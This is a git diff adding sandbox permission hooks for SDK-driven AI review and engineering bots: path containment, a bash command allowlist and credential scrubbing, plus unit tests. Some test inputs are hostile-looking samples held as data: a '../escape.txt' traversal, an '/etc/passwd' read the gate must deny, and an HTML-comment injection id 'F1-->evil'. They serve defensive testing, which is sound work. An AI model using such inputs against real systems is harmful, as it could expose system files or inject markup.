+            return {}
+        ti = _extract_tool_input(input_data)
+        cmd = ti.get("command") or ti.get("cmd") or ""
+        if not bash_command_allowed(cmd, allowlist):
+            try:
+                head = shlex.split(cmd)[:3]
+            except ValueError:
+                head = [cmd[:60]]
+            return _deny(f"command not in allowlist: {head!r}")
+        # Enforce the per-task cap. NOTE: the SDK Bash tool's timeout field
+        # NAME and UNIT (ms vs s) are UNVERIFIED until PR1's smoke exercises a
+        # real Bash call. Until then we SET the cap unconditionally (a ceiling)
+        # rather than clamping a model-supplied value: this avoids both the
+        # falsy-0 trap (`if existing` would replace a 0 with the full cap) and
+        # a unit-mismatch where min(60, 900_000) would yield a 60ms timeout.
+        timeout_ms = timeout * 1000
+        ti = dict(ti)
+        ti["timeout"] = timeout_ms
+        return _allow_with_input(ti)
+
+    return bash_hook
+
+
+def bash_command_allowed(
+    cmd: str,
+    allowlist: tuple[tuple[str, ...], ...],
+) -> bool:
+    """Return True iff ``cmd`` tokenizes to a non-empty argv whose prefix
+    matches an allowlist entry.
+
+    Exact port of the gate in ``tools.make_bash_tool`` (tools.py:370-377):
+    ``shlex.split`` (raises -> reject), empty argv -> reject, then
+    ``any(tuple(argv[:len(p)]) == p for p in allowlist)``.
+    """
+    try:
+        argv = shlex.split(cmd)
+    except ValueError:
+        return False
+    if not argv:
+        return False
+    return any(tuple(argv[: len(p)]) == p for p in allowlist)
+
+
+def make_can_use_tool(
+    allowed_root: Path,
+    *,
+    denied_subpaths: tuple[Path, ...] = (),
+    bash_allowlist: tuple[tuple[str, ...], ...] = (),
+    allowed_tool_names: tuple[str, ...] = (),
+) -> Callable[..., Any]:
+    """Build the per-call ``can_use_tool`` permission callback: a HARD
+    pre-execution deny that mirrors the path + bash gates.
+
+    This is defense-in-depth alongside the PreToolUse hooks (and, for the
+    in-process ``@tool`` bodies, alongside the checks inside the tool
+    itself -- matching the existing double-layered containment in
+    ``reviewer_bot/agent.py``). It returns the SDK ``can_use_tool`` allow
+    /deny decision shape.
+    """
+
+    async def can_use_tool(tool_name, input_data, context):  # noqa: ANN001
+        ti = _extract_tool_input(input_data)
+        # In-process @tool names arrive fully-qualified (mcp__<server>__<tool>);
+        # strip to the bare name so the path/bash gates ALSO apply to that
+        # surface (second layer alongside the tool bodies). Without this the
+        # denied_subpaths/bash_allowlist args were inert for mcp__* calls. The
+        # allowed_tool_names allowlist below still matches the FQ name. (Review)
+        base = tool_name.rsplit("__", 1)[-1]
+        keys = _PATH_TOOLS.get(base)
+        if keys:
+            for key in keys:
+                rel = ti.get(key)
+                if rel is not None and _resolve_inside(
+                    allowed_root, denied_subpaths, str(rel)
+                ) is None:
+                    return {
+                        "behavior": "deny",
+                        "message": f"{tool_name}: path {rel!r} outside sandbox",
+                    }
+            return {"behavior": "allow", "updatedInput": ti}
+        if base in ("Bash", "bash"):
+            cmd = ti.get("command") or ti.get("cmd") or ""
+            if not bash_command_allowed(cmd, bash_allowlist):
+                return {"behavior": "deny", "message": "command not in allowlist"}
+            return {"behavior": "allow", "updatedInput": ti}
+        # Non-path / non-Bash tools (e.g. MCP @tool names
+        # mcp__<server>__<tool>): if an explicit allowed_tool_names tuple was
+        # provided, deny anything not in it. When it is EMPTY (the default),
+        # this callback does not re-deny — default-deny is then enforced at
+        # the SDK layer by ClaudeAgentOptions(allowed_tools=[...]) (invariant
+        # #39); this callback only adds the path + bash hard-denies above.
+        # Pass allowed_tool_names to make the callback itself default-deny.
+        if allowed_tool_names and tool_name not in allowed_tool_names:
+            return {"behavior": "deny", "message": f"tool {tool_name!r} not permitted"}
+        return {"behavior": "allow", "updatedInput": ti}
+
+    return can_use_tool
+
+
+def make_pre_tool_hooks(
+    allowed_root: Path,
+    *,
+    denied_subpaths: tuple[Path, ...] = (),
+    bash_allowlist: tuple[tuple[str, ...], ...] = (),
+    bash_timeout: int = 300,
+) -> Any:
+    """Assemble the ``hooks`` mapping for ``ClaudeAgentOptions``: the
+    safe_path PreToolUse hook (Read/Edit/Write/Glob/Grep) plus the Bash
+    allowlist+timeout PreToolUse hook.
+
+    Returns ``{"PreToolUse": [HookMatcher(...), ...]}``. Raises a clear
+    error if the SDK is not installed (the matchers are SDK types).
+    """
+    if _SDK_IMPORT_ERROR is not None or HookMatcher is None:
+        raise RuntimeError(
+            "claude_agent_sdk is not installed; cannot build HookMatchers. "
+            f"Original import error: {_SDK_IMPORT_ERROR!r}"
+        )
+    return {
+        "PreToolUse": [
+            HookMatcher(
+                matcher="Read|Edit|Write|Glob|Grep",
+                hooks=[make_safe_path_hook(allowed_root, denied_subpaths)],
+            ),
+            HookMatcher(
+                matcher="Bash",
+                hooks=[make_bash_allowlist_hook(bash_allowlist, bash_timeout)],
+            ),
+        ]
+    }
+
+
+def scrubbed_env(base: Optional[dict[str, str]] = None) -> dict[str, str]:
+    """Return the process environment with credential-shaped vars removed,
+    for ``ClaudeAgentOptions(env=...)``.
+
+    Delegates to ``env_scrub.scrub`` so the 12-regex table (and its
+    deliberate avoidance of blanket ^DATABRICKS_/^AWS_/^AZURE_ prefixes)
+    is reused VERBATIM -- the doc forbids rewriting it. Because the SDK's
+    Bash tool inherits the CLI process env, scrubbing the options' ``env``
+    covers spawned subprocesses (invariant #5).
+
+    NOTE (migration doc risk): verify in the PR1 smoke test that the SDK
+    does not re-inject ``ANTHROPIC_AUTH_TOKEN`` / ``DATABRICKS_TOKEN`` into
+    the Bash subprocess env; if it does, add a PostToolUse stdout/stderr
+    redaction hook as defense-in-depth.
+    """
+    import os
+
+    source = base if base is not None else dict(os.environ)
+    return env_scrub.scrub(source)
+
+
+# Re-export the raw scrub under this module's namespace. The canonical table
+# now lives in ``shared/env_scrub.py`` (relocated in PR1), so PR6's deletion of
+# ``engineer_bot/env_scrub.py`` is a pure deletion of a re-export shim -- it no
+# longer threatens this import.
+scrub_env = env_scrub.scrub
diff --git a/scripts/shared/tests/__init__.py b/scripts/shared/tests/__init__.py
new file mode 100644
index 000000000..e69de29bb
diff --git a/scripts/shared/tests/test_json_utils.py b/scripts/shared/tests/test_json_utils.py
new file mode 100644
index 000000000..71dfb9198
--- /dev/null
+++ b/scripts/shared/tests/test_json_utils.py
@@ -0,0 +1,57 @@
+"""Tests for the relocated JSON-extraction helpers.
+
+These import from the new canonical home (``json_utils``); the parallel
+``test_llm_client.py`` suite imports the same names via the re-export shim
+in ``llm_client`` and must keep passing — together they prove the PR1
+relocation is behaviour-preserving.
+"""
+import json
+
+import pytest
+
+from scripts.shared.json_utils import extract_json_block, ParseError
+
+
+def test_pure_json():
+    assert extract_json_block('{"a": 1, "b": [2, 3]}') == {"a": 1, "b": [2, 3]}
+
+
+def test_fenced_json():
+    text = "preamble\n```json\n{\"findings\": [], \"summary\": \"ok\"}\n```\ntrailer"
+    assert extract_json_block(text) == {"findings": [], "summary": "ok"}
+
+
+def test_nested_backticks_in_string_value():
+    """A ```suggestion fenced block inside a string value must not break
+    brace-balancing (the reason we use a balancer, not a regex)."""
+    payload = {"suggestion": "```suggestion\nAssertEqual(5, x)\n```", "id": "F1"}
+    text = f"Here is my review:\n{json.dumps(payload)}"
+    assert extract_json_block(text)["suggestion"].startswith("```suggestion")
+
+
+def test_last_object_wins_when_schema_echoed():
+    text = '{"example": true}\nactual answer below\n{"findings": [], "summary": "real"}'
+    assert extract_json_block(text) == {"findings": [], "summary": "real"}
+
+
+def test_braces_inside_strings_ignored():
+    assert extract_json_block('{"body": "use {curly} and \\"quoted\\" text"}') == {
+        "body": 'use {curly} and "quoted" text'
+    }
+
+
+def test_empty_raises():
+    with pytest.raises(ParseError):
+        extract_json_block("   ")
+
+
+def test_no_object_raises():
+    with pytest.raises(ParseError):
+        extract_json_block("no json here at all")
+
+
+def test_reexport_identity():
+    """The shim in llm_client must be the very same object, not a copy."""
+    from scripts.shared import llm_client
+    assert llm_client.extract_json_block is extract_json_block
+    assert llm_client.ParseError is ParseError
diff --git a/scripts/shared/tests/test_llm_client.py b/scripts/shared/tests/test_llm_client.py
new file mode 100644
index 000000000..b5bc895c9
--- /dev/null
+++ b/scripts/shared/tests/test_llm_client.py
@@ -0,0 +1,108 @@
+import json
+import pytest
+
+from scripts.shared.llm_client import (
+    extract_json_block, ParseError,
+)
+
+
+def test_extract_json_block_simple():
+    text = '''Some preamble.
+
+```json
+{"findings": [], "summary": "ok"}
+```
+
+Trailing chatter.'''
+    obj = extract_json_block(text)
+    assert obj == {"findings": [], "summary": "ok"}
+
+
+def test_extract_json_with_markdown_content():
+    """Body field contains raw `<`, `>`, `&` — JSON natively handles it."""
+    payload = {
+        "findings": [
+            {
+                "id": "F1",
+                "severity": "high",
+                "body": "Should use `<details>` & not `<summary>` here.",
+            }
+        ],
+        "summary": "Use **bold** and `code` & <em>html</em>."
+    }
+    text = f"```json\n{json.dumps(payload)}\n```"
+    obj = extract_json_block(text)
+    assert obj["findings"][0]["body"].startswith("Should use `<details>`")
+    assert "<em>html</em>" in obj["summary"]
+
+
+def test_extract_json_without_fence_works():
+    """Bare JSON (no fence) now works — the prompt no longer requires
+    a fence, and the parser is tolerant of either form."""
+    text = '{"this": "is not in a fence", "ok": true}'
+    obj = extract_json_block(text)
+    assert obj == {"this": "is not in a fence", "ok": True}
+
+
+def test_extract_json_with_malformed_payload_raises():
+    text = "```json\n{not actually valid json\n```"
+    with pytest.raises(ParseError):
+        extract_json_block(text)
+
+
+def test_extract_json_no_braces_at_all_raises():
+    text = "the model emitted only prose, no json at all"
+    with pytest.raises(ParseError):
+        extract_json_block(text)
+
+
+def test_extract_json_with_multiple_fences_takes_last():
+    """When the model echoes the schema example before its real answer,
+    the LAST balanced object is the actual response."""
+    text = """```json
+{"a": 1}
+```
+some text
+```json
+{"b": 2}
+```"""
+    obj = extract_json_block(text)
+    assert obj == {"b": 2}
+
+
+def test_extract_json_with_nested_suggestion_fence_in_string():
+    """A finding's suggestion field contains a ```suggestion fence inside
+    the string value. Brace-balanced parsing must NOT treat the inner
+    ``` as the end of the outer JSON fence. This is the regression that
+    broke the bot on commit 32246c95."""
+    payload = {
+        "findings": [
+            {
+                "id": "F1",
+                "severity": "high",
+                "body": "Replace this loop with a comprehension.",
+                "suggestion": "```suggestion\nresult = [x * 2 for x in items]\n```",
+            }
+        ],
+        "summary": "One inline suggestion."
+    }
+    # Wrap in a ```json fence (typical model output) — the nested
+    # ```suggestion inside the suggestion string MUST not confuse the parser.
+    text = f"```json\n{json.dumps(payload)}\n```"
+    obj = extract_json_block(text)
+    assert obj["findings"][0]["id"] == "F1"
+    assert "```suggestion" in obj["findings"][0]["suggestion"]
+
+
+def test_extract_json_pure_no_fence_no_prose():
+    """When the model follows the new instruction (no fence, no prose,
+    just JSON), the fast path returns directly."""
+    text = '{"findings": [], "summary": "all good"}'
+    obj = extract_json_block(text)
+    assert obj == {"findings": [], "summary": "all good"}
+
+
+# NOTE: the TOOLS_SCHEMA tests were removed in PR6 — the OpenAI-format
+# TOOLS_SCHEMA (and call_llm) were deleted from llm_client when the bots moved
+# to the SDK's in-process @tool servers. The finalize_review/read_paths/grep
+# schemas now live as @tool definitions in scripts/reviewer_bot/sdk_tools.py.
diff --git a/scripts/shared/tests/test_markers.py b/scripts/shared/tests/test_markers.py
new file mode 100644
index 000000000..e1c1f8848
--- /dev/null
+++ b/scripts/shared/tests/test_markers.py
@@ -0,0 +1,83 @@
+"""Tests for shared.markers — generic namespaced HTML marker builders."""
+from __future__ import annotations
+
+from scripts.shared import markers
+
+
+class TestMarkerBuilder:
+    def test_simple_marker_for_namespace(self):
+        m = markers.marker("engineer-bot", "fix-push")
+        assert m == "<!-- engineer-bot:v1 fix-push -->"
+
+    def test_marker_with_id_sanitization(self):
+        # Sanitization strips `>` (and any other char outside [A-Za-z0-9_.-])
+        # but KEEPS `-` so ids like F1-followup survive. The security
+        # invariant is that the marker contains exactly one `-->` (the
+        # closer), which is guaranteed by stripping `>`.
+        m = markers.marker_with_id("engineer-bot", "followup", "F1-->evil")
+        assert m.count("-->") == 1
+        assert m.endswith("-->")
+        # No injected HTML in the id portion (the marker itself starts
+        # with `<!--`, so we check just the id field).
+        assert "<" not in m.split("id=", 1)[1]
+        # `>` stripped, `-` kept twice → "F1--evil"
+        assert "id=F1--evil" in m
+
+    def test_marker_with_id_caps_length(self):
+        long_id = "x" * 200
+        m = markers.marker_with_id("engineer-bot", "followup", long_id)
+        assert "id=" + ("x" * 40) + " -->" in m
+
+    def test_marker_with_id_empty_falls_back(self):
+        m = markers.marker_with_id("ns", "k", "")
+        assert "id=unknown" in m
+
+    def test_marker_with_id_none_falls_back(self):
+        m = markers.marker_with_id("ns", "k", None)
+        assert "id=unknown" in m
+
+    def test_has_marker_substring_match(self):
+        body = "Some text\n<!-- engineer-bot:v1 fix-push -->\nMore"
+        assert markers.has_marker(body, "engineer-bot", "fix-push")
+        assert not markers.has_marker(body, "engineer-bot", "review")
+        assert not markers.has_marker(body, "other-bot", "fix-push")
+
+    def test_has_any_marker_for_namespace(self):
+        body = "<!-- engineer-bot:v1 anything -->"
+        assert markers.has_any_marker(body, "engineer-bot")
+        assert not markers.has_any_marker(body, "reviewer-bot")
+
+    def test_has_any_marker_skips_blockquoted_line(self):
+        """When a reviewer quotes the bot's prior reply via GitHub's
+        blockquote syntax (`>` prefix), the quoted body — including
+        the marker — appears in the reviewer's reply. has_any_marker
+        must NOT match those quoted markers, otherwise the reviewer's
+        reply is misclassified as bot-authored and suppresses
+        re-engagement / breaks the own-reply loop guards."""
+        body = (
+            "Reviewer's reply:\n"
+            "> previous bot text\n"
+            "> <!-- engineer-bot:v1 followup -->\n"
+        )
+        assert markers.has_any_marker(body, "engineer-bot") is False
+
+    def test_has_any_marker_matches_indented_quote_too(self):
+        """Markdown allows leading whitespace before `>` in nested
+        quotes. The skip must apply regardless of indent."""
+        body = "Outer:\n  > <!-- engineer-bot:v1 inner -->\n"
+        assert markers.has_any_marker(body, "engineer-bot") is False
+
+    def test_has_any_marker_finds_marker_alongside_quote(self):
+        """If a body has BOTH a quoted (irrelevant) marker AND an
+        unquoted (active) marker, the active one wins."""
+        body = (
+            "> <!-- engineer-bot:v1 quoted -->\n"
+            "<!-- engineer-bot:v1 active -->\n"
+        )
+        assert markers.has_any_marker(body, "engineer-bot") is True
+
+    def test_has_marker_skips_blockquoted_line(self):
+        """Same blockquote rule applies to `has_marker` (specific
+        kind), since the same false-positive surface exists."""
+        body = "> <!-- engineer-bot:v1 fix-push -->\n"
+        assert markers.has_marker(body, "engineer-bot", "fix-push") is False
diff --git a/scripts/shared/tests/test_sdk_agent.py b/scripts/shared/tests/test_sdk_agent.py
new file mode 100644
index 000000000..625b6f8f4
--- /dev/null
+++ b/scripts/shared/tests/test_sdk_agent.py
@@ -0,0 +1,369 @@
+"""Tests for sdk_agent endpoint translation + env configuration.
+
+These cover the pure, SDK-independent surface of sdk_agent (the part that
+does NOT require claude_agent_sdk to be installed): translate_endpoint and
+configure_databricks_env. The agent-loop itself is exercised by the live
+PR1 smoke test (tools/sdk_smoke.py), not here.
+"""
+import os
+
+import pytest
+
+from scripts.shared import sdk_agent
+
+
+# ── translate_endpoint: derived from csharp_coverage/initial.py:_translate_endpoint ──
+# (shares the v1->v2 workspace rewrite, but intentionally diverges: fail-closed
+#  on empty/unrecognized input + strips a trailing /v1/messages — see below)
+
+def test_translate_v1_invocations_url():
+    src = "https://ws.azuredatabricks.net/serving-endpoints/databricks-claude-opus-4-7/invocations"
+    assert sdk_agent.translate_endpoint(src) == (
+        "https://ws.azuredatabricks.net/serving-endpoints/anthropic"
+    )
+
+
+def test_translate_already_v2_base_passthrough():
+    src = "https://ws.azuredatabricks.net/serving-endpoints/anthropic"
+    assert sdk_agent.translate_endpoint(src) == src
+
+
+def test_translate_strips_trailing_v1_messages():
+    """The CLI re-appends /v1/messages, so a base that already carries it
+    must be normalised back to the bare base (avoids double-append)."""
+    src = "https://ws.azuredatabricks.net/serving-endpoints/anthropic/v1/messages"
+    assert sdk_agent.translate_endpoint(src) == (
+        "https://ws.azuredatabricks.net/serving-endpoints/anthropic"
+    )
+
+
+def test_translate_strips_trailing_slash():
+    src = "https://ws.azuredatabricks.net/serving-endpoints/some-model/invocations/"
+    assert sdk_agent.translate_endpoint(src) == (
+        "https://ws.azuredatabricks.net/serving-endpoints/anthropic"
+    )
+
+
+def test_translate_empty_fails_closed():
+    """Empty / unparseable input must return '' (not a bogus relative
+    '/serving-endpoints/anthropic') so run_agent never sets a malformed
+    ANTHROPIC_BASE_URL."""
+    assert sdk_agent.translate_endpoint("") == ""
+    assert sdk_agent.translate_endpoint("   ") == ""
+    assert sdk_agent.translate_endpoint("https://ws.net/no/serving/here") == ""
+
+
+# ── configure_databricks_env ──
+
+@pytest.fixture
+def clean_env(monkeypatch):
+    for k in (
+        "ANTHROPIC_BASE_URL", "ANTHROPIC_AUTH_TOKEN", "ANTHROPIC_MODEL",
+        "ANTHROPIC_API_KEY", "MODEL_ENDPOINT", "DATABRICKS_TOKEN",
+    ):
+        monkeypatch.delenv(k, raising=False)
+    return monkeypatch
+
+
+def test_configure_sets_all_three_anthropic_vars(clean_env):
+    sdk_agent.configure_databricks_env(
+        "databricks-claude-opus-4-7",
+        endpoint="https://ws.net/serving-endpoints/m/invocations",
+        token="dapi-secret",
+    )
+    assert os.environ["ANTHROPIC_BASE_URL"] == "https://ws.net/serving-endpoints/anthropic"
+    assert os.environ["ANTHROPIC_AUTH_TOKEN"] == "dapi-secret"
+    assert os.environ["ANTHROPIC_MODEL"] == "databricks-claude-opus-4-7"
+
+
+def test_configure_never_sets_api_key(clean_env):
+    """Databricks uses Bearer auth via ANTHROPIC_AUTH_TOKEN, NOT the
+    ANTHROPIC_API_KEY name."""
+    sdk_agent.configure_databricks_env(
+        "m", endpoint="https://ws.net/serving-endpoints/m/invocations", token="t"
+    )
+    assert "ANTHROPIC_API_KEY" not in os.environ
+
+
+def test_configure_falls_back_to_process_env(clean_env):
+    clean_env.setenv("MODEL_ENDPOINT", "https://ws.net/serving-endpoints/m/invocations")
+    clean_env.setenv("DATABRICKS_TOKEN", "from-env")
+    sdk_agent.configure_databricks_env("m")
+    assert os.environ["ANTHROPIC_BASE_URL"] == "https://ws.net/serving-endpoints/anthropic"
+    assert os.environ["ANTHROPIC_AUTH_TOKEN"] == "from-env"
+
+
+# ── _classify_http_error: must NOT match incidental numbers (review F1/F2) ──
+
+def test_classify_matches_http_context():
+    assert sdk_agent._classify_http_error(Exception("HTTP 429 Too Many Requests")) == 429
+    assert sdk_agent._classify_http_error(Exception("status: 503")) == 503
+    assert sdk_agent._classify_http_error(Exception("code=500")) == 500
+
+
+def test_classify_ignores_incidental_numbers():
+    """A bare 3-digit number with no HTTP/status/code context must NOT be
+    mistaken for a status code (would spuriously skip the retrospective)."""
+    for msg in ("connection reset after 500ms", "port 5000 unavailable",
+                "line 412 in foo.py", "retry budget 4000"):
+        assert sdk_agent._classify_http_error(Exception(msg)) is None
+
+
+def test_classify_prefers_structured_attr():
+    exc = Exception("opaque transport failure")
+    exc.status_code = 502  # type: ignore[attr-defined]
+    assert sdk_agent._classify_http_error(exc) == 502
+
+
+# ── _merge_coding_agent_header: must never DROP our header (review F3) ──
+
+def test_merge_header_sets_when_absent():
+    env = {}
+    sdk_agent._merge_coding_agent_header(env)
+    assert env["ANTHROPIC_CUSTOM_HEADERS"] == sdk_agent.DATABRICKS_CODING_AGENT_HEADER
+
+
+def test_merge_header_appends_to_unrelated_value():
+    """A caller's pre-existing header must NOT drop the coding-agent opt-in
+    (a plain setdefault would — reproducing the 400 this fixes)."""
+    env = {"ANTHROPIC_CUSTOM_HEADERS": "x-trace-id: abc"}
+    sdk_agent._merge_coding_agent_header(env)
+    val = env["ANTHROPIC_CUSTOM_HEADERS"]
+    assert "x-trace-id: abc" in val
+    assert "x-databricks-use-coding-agent-mode" in val
+
+
+def test_merge_header_idempotent():
+    env = {"ANTHROPIC_CUSTOM_HEADERS": "x-databricks-use-coding-agent-mode: true"}
+    sdk_agent._merge_coding_agent_header(env)
+    assert env["ANTHROPIC_CUSTOM_HEADERS"].count("coding-agent-mode") == 1
+
+
+def test_merge_header_appends_when_set_to_false():
+    """A caller who set the header to `false` must still get the `: true`
+    opt-in appended (presence check matches the full name: true). (Review F11/F14)"""
+    env = {"ANTHROPIC_CUSTOM_HEADERS": "x-databricks-use-coding-agent-mode: false"}
+    sdk_agent._merge_coding_agent_header(env)
+    assert "x-databricks-use-coding-agent-mode: true" in env["ANTHROPIC_CUSTOM_HEADERS"]
+
+
+def test_maybe_raise_http_error_uses_api_error_status():
+    """_maybe_raise_http_error reads the structured api_error_status first
+    (confirmed present on ResultMessage by the smoke probe), not just the
+    message regex. (Review — doc:62)"""
+    from types import SimpleNamespace
+    msg = SimpleNamespace(is_error=True, api_error_status=503, result="overloaded", subtype="error")
+    try:
+        sdk_agent._maybe_raise_http_error(msg)
+        assert False, "expected _HttpError"
+    except sdk_agent._HttpError as e:
+        assert e.code == 503
+    # No error → no raise.
+    ok = SimpleNamespace(is_error=False, api_error_status=None, result="OK")
+    sdk_agent._maybe_raise_http_error(ok)  # must not raise
+
+
+def test_record_tool_use_handles_mcp_qualified_names():
+    """The SDK reports in-process @tool names fully-qualified
+    (mcp__engineer-tools__edit_file). _record_tool_use must still populate
+    touched_files / bash_invocations or the write-scope gate goes blind.
+    (Review — initial.py:279)"""
+    r = sdk_agent.AgentResult()
+    sdk_agent._record_tool_use(r, "mcp__engineer-tools__edit_file", {"path": "tests/x.cs"})
+    sdk_agent._record_tool_use(r, "mcp__engineer-tools__bash", {"command": "dotnet build"})
+    assert r.touched_files == ["tests/x.cs"]
+    assert r.bash_invocations == [{"cmd": "dotnet build"}]
+    # Built-in (unqualified) names still work.
+    r2 = sdk_agent.AgentResult()
+    sdk_agent._record_tool_use(r2, "Edit", {"file_path": "a.py"})
+    assert r2.touched_files == ["a.py"]
+
+
+def test_maybe_raise_http_error_ignores_non_error_status():
+    """A 2xx/1xx api_error_status must not mint an http_error stop."""
+    from types import SimpleNamespace
+    msg = SimpleNamespace(is_error=True, api_error_status=200, result="weird", subtype="")
+    sdk_agent._maybe_raise_http_error(msg)  # 200 is not 4xx/5xx -> no raise (regex fallback finds nothing)
+
+
+# ── Tier-2: output_format / structured_output capture ──
+# A hardened live smoke probe (tools/sdk_smoke.py) confirmed the Databricks
+# gateway honours output_format json_schema: a clean {'verdict':'ok',
+# 'findings':[]} dict on a subtype=success terminal ResultMessage. These unit
+# tests pin the sdk_agent plumbing that surfaces it to callers.
+
+class ResultMessage:
+    # Class name drives _accumulate's dispatch (cls = type(msg).__name__), so it
+    # MUST be 'ResultMessage' for the terminal-message branch to fire.
+    def __init__(self, **kw):
+        self.__dict__.update(kw)
+
+
+def test_accumulate_captures_structured_output():
+    """When output_format is set, the validated dict arrives on
+    ResultMessage.structured_output; _accumulate must lift it onto
+    AgentResult.structured_output so the reviewer can drop finalize_review."""
+    r = sdk_agent.AgentResult()
+    payload = {"verdict": "ok", "findings": []}
+    sdk_agent._accumulate(r, ResultMessage(structured_output=payload, subtype="success"))
+    assert r.structured_output == payload
+
+
+def test_accumulate_leaves_structured_output_none_when_absent():
+    """Tier-1 (no output_format): the terminal message has no structured_output
+    (or None), so AgentResult.structured_output stays None — existing callers
+    are unaffected."""
+    r = sdk_agent.AgentResult()
+    assert r.structured_output is None
+    sdk_agent._accumulate(r, ResultMessage(structured_output=None, subtype="success"))
+    assert r.structured_output is None
+    # Attribute entirely absent (older SDK / non-output_format run) is also fine.
+    sdk_agent._accumulate(r, ResultMessage(subtype="success"))
+    assert r.structured_output is None
+
+
+# ── Real per-run telemetry (replaces the reviewer observer 0/0/(none)) ──
+
+class ToolUseBlock:
+    def __init__(self, name, **kw):
+        self.name = name
+        self.input = kw.get("input", {})
+        self.id = kw.get("id", "t1")
+
+
+class TextBlock:
+    def __init__(self, text):
+        self.text = text
+
+
+class ThinkingBlock:
+    def __init__(self, thinking):
+        self.thinking = thinking
+
+
+class AssistantMessage:
+    def __init__(self, content):
+        self.content = content
+
+
+def test_accumulate_records_every_tool_call():
+    """_accumulate appends EVERY ToolUseBlock name (not just edit/bash) to
+    AgentResult.tool_calls, so the reviewer observer reports real tool usage
+    (read_paths/grep/finalize_review) instead of a hardcoded '(none)'."""
+    r = sdk_agent.AgentResult()
+    sdk_agent._accumulate(r, AssistantMessage([
+        ToolUseBlock("mcp__reviewer-tools__read_paths"),
+        ToolUseBlock("mcp__reviewer-tools__finalize_review"),
+    ]))
+    assert r.tool_calls == [
+        "mcp__reviewer-tools__read_paths",
+        "mcp__reviewer-tools__finalize_review",
+    ]
+
+
+def test_format_tool_input_shows_full_values_up_to_cap():
+    out = sdk_agent._format_tool_input({
+        "pattern": "Lz4Buffer",
+        "reason": "y" * 300,                  # well under the 500 cap
+        "paths": ["a.cs", "b.cs"],
+    })
+    assert "pattern=Lz4Buffer" in out
+    assert "y" * 300 in out               # full value (under cap), not truncated
+    assert "…" not in out                 # no marker when under cap
+    assert '["a.cs", "b.cs"]' in out      # list rendered fully as compact JSON
+
+
+def test_format_tool_input_caps_large_value_with_explicit_marker():
+    out = sdk_agent._format_tool_input({"content": "x" * 5000})
+    assert "x" * 5000 not in out          # large value capped, not dumped whole
+    assert "…[+4500 chars]" in out        # explicit dropped-char marker
+    assert len(out) < 600                 # bounded near the 500 cap
+
+
+def test_format_tool_input_flattens_newlines_to_one_line():
+    out = sdk_agent._format_tool_input({"command": "dotnet build\ndotnet test"})
+    assert "\n" not in out
+    assert "command=dotnet build dotnet test" in out
+
+
+def test_accumulate_prints_live_per_turn_trace_for_tool_turns(capsys):
+    """A ToolUseBlock turn prints `[agent] turn N: tool=...` (and NOT a
+    `(no tool)` line)."""
+    r = sdk_agent.AgentResult()
+    sdk_agent._accumulate(r, AssistantMessage([
+        ToolUseBlock(
+            "mcp__reviewer-tools__grep",
+            input={"pattern": "foo", "path": "csharp/src/"},
+        ),
+    ]))
+    out = capsys.readouterr().out
+    assert "[agent] turn 1: tool=mcp__reviewer-tools__grep" in out
+    assert "pattern=foo" in out
+    assert "(no tool)" not in out
+
+
+def test_accumulate_logs_text_only_turn(capsys):
+    """A turn with no tool call still logs `[agent] turn N: (no tool) ...` so
+    every turn is accounted for (and a slow thinking turn is visible)."""
+    r = sdk_agent.AgentResult()
+    sdk_agent._accumulate(r, AssistantMessage([
+        TextBlock("Let me think about this before acting."),
+    ]))
+    out = capsys.readouterr().out
+    assert "[agent] turn 1: (no tool)" in out
+    assert "Let me think about this before acting." in out
+
+
+def test_accumulate_logs_thinking_only_turn(capsys):
+    """A thinking-only turn (ThinkingBlock, no text/tool) surfaces the thinking
+    content as `(thinking) ...` instead of a blank `(no tool)` line."""
+    r = sdk_agent.AgentResult()
+    sdk_agent._accumulate(r, AssistantMessage([
+        ThinkingBlock("First I should read the file, then check the callers."),
+    ]))
+    out = capsys.readouterr().out
+    assert "[agent] turn 1: (thinking)" in out
+    assert "First I should read the file" in out
+
+
+def test_accumulate_captures_usage_and_cost():
+    """A terminal ResultMessage with `usage` + `total_cost_usd` populates the
+    token/cost fields the observer logs."""
+    r = sdk_agent.AgentResult()
+    sdk_agent._accumulate(r, ResultMessage(
+        usage={"input_tokens": 1200, "output_tokens": 340},
+        total_cost_usd=0.0123, subtype="success",
+    ))
+    assert r.prompt_tokens == 1200
+    assert r.completion_tokens == 340
+    assert abs(r.total_cost_usd - 0.0123) < 1e-9
+
+
+def test_accumulate_telemetry_defaults_when_absent():
+    """No usage/cost on the terminal message → fields stay at their 0 defaults
+    (a missing-usage run, or the SDK absent in tests, is safe)."""
+    r = sdk_agent.AgentResult()
+    sdk_agent._accumulate(r, ResultMessage(subtype="success"))
+    assert r.prompt_tokens == 0
+    assert r.completion_tokens == 0
+    assert r.total_cost_usd == 0.0
+    assert r.tool_calls == []
+
+
+def test_accumulate_sums_cache_tokens_into_prompt_tokens():
+    """prompt_tokens reflects the FULL input the model processed: with prompt
+    caching, input_tokens is tiny (the uncached delta) and the bulk is in
+    cache_creation/cache_read. Summing all three is what makes 'did the diff
+    reach the model?' answerable (a cached 6k-token prompt must not read as 3)."""
+    r = sdk_agent.AgentResult()
+    sdk_agent._accumulate(r, ResultMessage(
+        usage={
+            "input_tokens": 3,
+            "cache_creation_input_tokens": 0,
+            "cache_read_input_tokens": 6000,
+            "output_tokens": 800,
+        },
+        subtype="success",
+    ))
+    assert r.prompt_tokens == 6003
+    assert r.completion_tokens == 800
diff --git a/scripts/shared/tests/test_sdk_security.py b/scripts/shared/tests/test_sdk_security.py
new file mode 100644
index 000000000..e555d64a6
--- /dev/null
+++ b/scripts/shared/tests/test_sdk_security.py
@@ -0,0 +1,153 @@
+"""Tests for the SDK security gates (sdk_security).
+
+The PreToolUse hooks and can_use_tool callback are async and require the
+SDK types only at registration time (make_pre_tool_hooks); the underlying
+gate *logic* is synchronous and SDK-independent, so we test it directly:
+  - _resolve_inside  (safe_path containment: invariants #1/#2/#9/#35)
+  - bash_command_allowed (argv allowlist: invariant #3)
+  - scrubbed_env (env_scrub passthrough: invariant #5)
+These mirror scripts/engineer_bot/tools.py + env_scrub.py semantics.
+"""
+import asyncio
+from pathlib import Path
+
+from scripts.shared import sdk_security
+
+
+# ── safe_path containment (_resolve_inside) ──
+
+def test_inside_root_allowed(tmp_path):
+    assert sdk_security._resolve_inside(tmp_path, (), "tests/foo.cs") is not None
+
+
+def test_parent_traversal_denied(tmp_path):
+    assert sdk_security._resolve_inside(tmp_path, (), "../escape.txt") is None
+
+
+def test_absolute_path_outside_denied(tmp_path):
+    assert sdk_security._resolve_inside(tmp_path, (), "/etc/passwd") is None
+
+
+def test_denied_subpath_directory(tmp_path):
+    denied = (tmp_path / "driver",)
